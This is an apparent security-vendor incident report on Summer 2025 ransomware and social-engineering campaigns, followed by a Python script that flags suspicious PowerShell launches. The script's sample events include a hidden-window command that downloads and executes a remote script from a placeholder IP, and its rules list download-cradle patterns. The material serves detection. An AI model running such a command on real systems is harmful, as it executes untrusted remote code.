Full Report
Can your defenses withstand the biggest attacks of Summer 2025? From Interlock's FileFix to Qilin, Scattered Spider, and ToolShell exploits—simulate them all against your organization's defenses with Picus Security Validation Platform to find gaps before attackers do. [...]
Analysis Summary
# Incident Report: Summer 2025 Multi-Sector Cyber Campaign Analysis
## Executive Summary
Summer 2025 was marked by a high volume of diverse, impactful cyberattacks across the Healthcare, Retail, and Insurance sectors, primarily driven by ransomware groups (Interlock, Qilin, DragonForce) and sophisticated social engineering actors (Scattered Spider). Initial access frequently utilized zero-day vulnerabilities (Fortinet) and social engineering (MFA fatigue, phishing). The primary impact involved widespread data exfiltration (EHRs, PII, financial records) and operational disruption via ransomware encryption. Response focused on containment, system restoration, and heightened security awareness training.
## Incident Details
- Discovery Date: Varies (e.g., Aflac detected access on June 12, 2025; Rhysida leak initiated July 8, 2025)
- Incident Date: Spring/Summer 2025 (spanning June–July 2025 for major reported events)
- Affected Organization: Florida Hand Center, Louis Vuitton, Belk, Aflac, Erie Insurance, Philadelphia Insurance Companies, Hospitals (various)
- Sector: Healthcare (HPH), Retail, Insurance, Financial
- Geography: Primarily US (Florida, North Carolina) and UK
## Timeline of Events
### Initial Access
- **June 2025 (Qilin):** Exploitation of unpatched Fortinet vulnerabilities (CVE-2024-21762 and CVE-2024-55591) used to gain entry into healthcare organizations.
- **April–May 2025 (Scattered Spider):** Identity-centric social engineering, including voice phishing, MFA fatigue, and help-desk impersonation against retailers and later insurance firms.
- **H1 2025 (ToolShell Campaign):** Exploitation of unpatched on-prem SharePoint servers.
- **July 22, 2025 (Interlock Advisory):** Interlock group noted for using "FileFix," a PowerShell launcher obfuscated via decoy file paths, targeting users via File Explorer.
### Lateral Movement
- **Qilin:** Lateral movement after initial access to deploy ransomware and exfiltrate data (EHRs, insurance records).
- **Interlock:** Implied lateral movement following PowerShell execution via FileFix.
### Data Exfiltration/Impact
- **July 8, 2025 (Rhysida):** Leaked medical images, driver's licenses, and insurance forms from Florida Hand Center after non-payment.
- **May 7–11, 2025 (DragonForce):** Exfiltrated 156 GB of customer/employee data, including SSNs, from Belk.
- **June 2025 (Scattered Spider):** Compromise of customer and employee data, including SSNs and health claims (Aflac). No ransomware deployed, but operational downtime reported at insurance firms.
### Detection & Response
- **Detection:** CISA/FBI/HHS issued advisory regarding Interlock on July 22, 2025. Aflac detected unauthorized access on June 12, 2025.
- **Response (General):** Security teams struggled to keep pace with exploit chains. Actions included patching critical infrastructure, re-securing help desks, and handling data leak negotiations (e.g., Rhysida threat deadline).
## Attack Methodology
| Phase | Method(s) Used |
| :--- | :--- |
| **Initial Access** | Exploitation of Fortinet vulnerabilities (CVE-2024-21762, CVE-2024-55591), PowerShell launching via "FileFix" (Interlock), Identity Social Engineering (MFA Fatigue, Help-desk Impersonation, Typosquatted Domains). |
| **Persistence** | Implied persistence via ransomware deployment (Qilin, DragonForce, Interlock). |
| **Privilege Escalation** | Not explicitly detailed, but required for successful lateral movement and data staging by ransomware groups. |
| **Defense Evasion** | Obfuscation via PowerShell loaders that hide scripts behind decoy file paths ("FileFix"); exploitation of unknown or unpatched firmware/software (e.g., SharePoint). |
| **Credential Access** | Identity-centric pivoting via MFA fatigue and help-desk impersonation (Scattered Spider). |
| **Discovery** | Standard reconnaissance implied prior to or during lateral movement. |
| **Lateral Movement** | Implied by successful deployment of ransomware across victim networks (Qilin, DragonForce). |
| **Collection** | Gathering of EHRs, insurance records, PII (SSNs), employee data, and medical images. |
| **Exfiltration** | Direct data transfer following compromise, leading to public leak sites upon non-payment. |
| **Impact** | System encryption (Ransomware) and data extortion via "Call Lawyer" features and automated negotiation tools (Qilin). |
## Impact Assessment
- **Financial:** Ransom payments likely occurred; costs associated with breach notification, remediation, and potential litigation (unquantified).
- **Data Breach:** High volume of sensitive data compromised, including medical images, SSNs, health claims, purchase histories, PII, and HR files.
- **Operational:** Significant operational downtime reported by insurance companies; elevated disruption risk in healthcare, where ransomware actors exploit the urgency of care delivery to pressure victims.
- **Reputational:** Damage to major global brands including Louis Vuitton (third breach in a quarter) and major US retailers/insurers.
## Indicators of Compromise
*Note: Specific IOCs were not detailed in the source text and are omitted here; TTPs are referenced instead.*
- **Network indicators:** Traffic associated with exploitation of Fortinet CVEs.
- **File indicators:** Use of PowerShell leveraging the "FileFix" technique.
- **Behavioral indicators:** Excessive help-desk interaction attempts, rapid privilege escalation post-initial access, and PowerShell abuse bypassing standard security monitoring.
## Response Actions
- **Containment:** Isolation of affected systems; halting immediate threat activity (Aflac contained unauthorized access).
- **Eradication:** (Implied) Rebuilding systems; cleaning persistence mechanisms deployed by ransomware actors.
- **Recovery:** Restoring operations, particularly critical functions in healthcare environments where downtime is unacceptable.
## Lessons Learned
- **Exploit Chains Matter:** Attackers targeted known vulnerabilities (Fortinet CVEs) but also leveraged overlooked infrastructure (unpatched on-prem SharePoint).
- **Identity is the Primary Vector:** Social engineering, MFA fatigue, and help-desk manipulation proved more effective than traditional malware delivery for certain high-value actors (Scattered Spider).
- **Ransomware Evolving:** Groups like Qilin are layering extortion tactics (legal themes, automated negotiation) to increase payout pressure beyond simple encryption.
## Recommendations
- **Patching Strategy Overhaul:** Prioritize CISA KEV entries and high-severity CVEs, and implement validation testing to confirm whether specific vulnerabilities are exploitable in the environment, focusing on exploit chains.
- **Harden Identity Controls:** Immediately implement mitigation strategies against social engineering attacks, including reinforcing help-desk verification procedures and limiting privileged access.
- **Human Firewall Testing:** Conduct frequent, realistic phishing and social engineering simulations, tailoring scenarios to known lures (e.g., voice phishing, MFA fatigue).
- **Behavioral Monitoring:** Deploy and tune monitoring for post-exploitation activity, specifically PowerShell abuse, credential theft, and stealthy data staging/exfiltration techniques.
- **Legacy System Audit:** Isolate or replace all ignored, unmonitored, or outdated on-premise infrastructure (e.g., legacy SharePoint servers).
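The behavioral indicators above and the Behavioral Monitoring recommendation both come down to the same detection problem: spotting PowerShell launched in ways that fit an obfuscated loader rather than normal administration. The following is an added example, not code from the Picus report or from any vendor product. It assumes Sysmon-style process-creation fields (Image, ParentImage, CommandLine, User) serialised one event per line as `key=value` pairs joined by `|`; the sample events, the rule weights and the alert threshold are all constructed for illustration. It does not reproduce FileFix itself; it keys on the generic traits the report names, namely PowerShell spawned from File Explorer and loader-style command lines (hidden window, policy bypass, encoded or downloaded payloads), and would sit beside, not replace, script block logging (Event ID 4104).

```python
"""Heuristic triage of PowerShell process-creation events (added example).

Assumes Sysmon Event ID 1 style fields; field names, sample events, rule
weights and threshold are assumptions made for this example.
"""
import ntpath
import re

# Constructed sample events: two loader-style launches from explorer.exe,
# one legitimate vendor agent running a script file, one non-PowerShell process.
SAMPLE_EVENTS = [
    "Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
    "|ParentImage=C:\\Windows\\explorer.exe"
    "|CommandLine=powershell.exe -w hidden -ep bypass -c \"iex (iwr http://203.0.113.5/a.ps1)\""
    "|User=CORP\\jdoe",
    "Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
    "|ParentImage=C:\\Windows\\explorer.exe"
    "|CommandLine=powershell.exe -NoProfile -EncodedCommand SQBFAFgA"
    "|User=CORP\\asmith",
    "Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
    "|ParentImage=C:\\Program Files\\Vendor\\agent.exe"
    "|CommandLine=powershell.exe -NoProfile -File C:\\ProgramData\\Vendor\\inventory.ps1"
    "|User=NT AUTHORITY\\SYSTEM",
    "Image=C:\\Windows\\System32\\notepad.exe"
    "|ParentImage=C:\\Windows\\explorer.exe"
    "|CommandLine=notepad.exe notes.txt"
    "|User=CORP\\jdoe",
]

POWERSHELL_IMAGES = {"powershell.exe", "pwsh.exe", "powershell_ise.exe"}

# (reason, weight, pattern) evaluated against CommandLine. Weights are assumptions.
COMMAND_LINE_RULES = [
    ("hidden window", 2, re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)),
    ("execution policy bypass", 1, re.compile(r"-e(?:p|xecutionpolicy)\s+bypass", re.I)),
    ("encoded command", 3, re.compile(r"-e(?:nc(?:odedcommand)?)?\s+[A-Za-z0-9+/=]{8,}", re.I)),
    ("download cradle", 3, re.compile(
        r"invoke-webrequest|\biwr\b|downloadstring|downloadfile|net\.webclient|start-bitstransfer", re.I)),
    ("invoke-expression", 2, re.compile(r"invoke-expression|\biex\b", re.I)),
]
EXPLORER_PARENT_WEIGHT = 2   # interactive shell (File Explorer) spawning PowerShell
ALERT_THRESHOLD = 4          # assumed cut-off; tune against your own baseline


def parse_event(line):
    """Turn 'k=v|k=v' into a dict; values may themselves contain '='."""
    event = {}
    for field in line.split("|"):
        key, _, value = field.partition("=")
        event[key.strip()] = value
    return event


def score_event(event):
    """Return (score, reasons) for one event; 0 for non-PowerShell images."""
    image = ntpath.basename(event.get("Image", "")).lower()
    if image not in POWERSHELL_IMAGES:
        return 0, []
    score, reasons = 0, []
    if ntpath.basename(event.get("ParentImage", "")).lower() == "explorer.exe":
        score += EXPLORER_PARENT_WEIGHT
        reasons.append("spawned from explorer.exe")
    cmdline = event.get("CommandLine", "")
    for reason, weight, pattern in COMMAND_LINE_RULES:
        if pattern.search(cmdline):
            score += weight
            reasons.append(reason)
    return score, reasons


def analyze(lines, threshold=ALERT_THRESHOLD):
    """Return findings at or above threshold, highest score first."""
    findings = []
    for line in lines:
        event = parse_event(line)
        score, reasons = score_event(event)
        if score >= threshold:
            findings.append({
                "user": event.get("User", ""),
                "parent": ntpath.basename(event.get("ParentImage", "")),
                "command_line": event.get("CommandLine", ""),
                "score": score,
                "reasons": reasons,
            })
    return sorted(findings, key=lambda f: f["score"], reverse=True)


if __name__ == "__main__":
    for finding in analyze(SAMPLE_EVENTS):
        print(f"[{finding['score']}] {finding['user']} <- {finding['parent']}: "
              f"{', '.join(finding['reasons'])}")
```

Run as-is, the script flags the two explorer-spawned launches (scores 10 and 5) and stays silent on the vendor agent's `-File` invocation, which is the point of weighting rather than matching any single flag: `-NoProfile` or a script file alone is routine, while a hidden window plus a download cradle from an interactive parent is not. In production the same scoring would be fed from Sysmon or EDR telemetry rather than an inline list, and the threshold tuned against a few weeks of the environment's own PowerShell baseline.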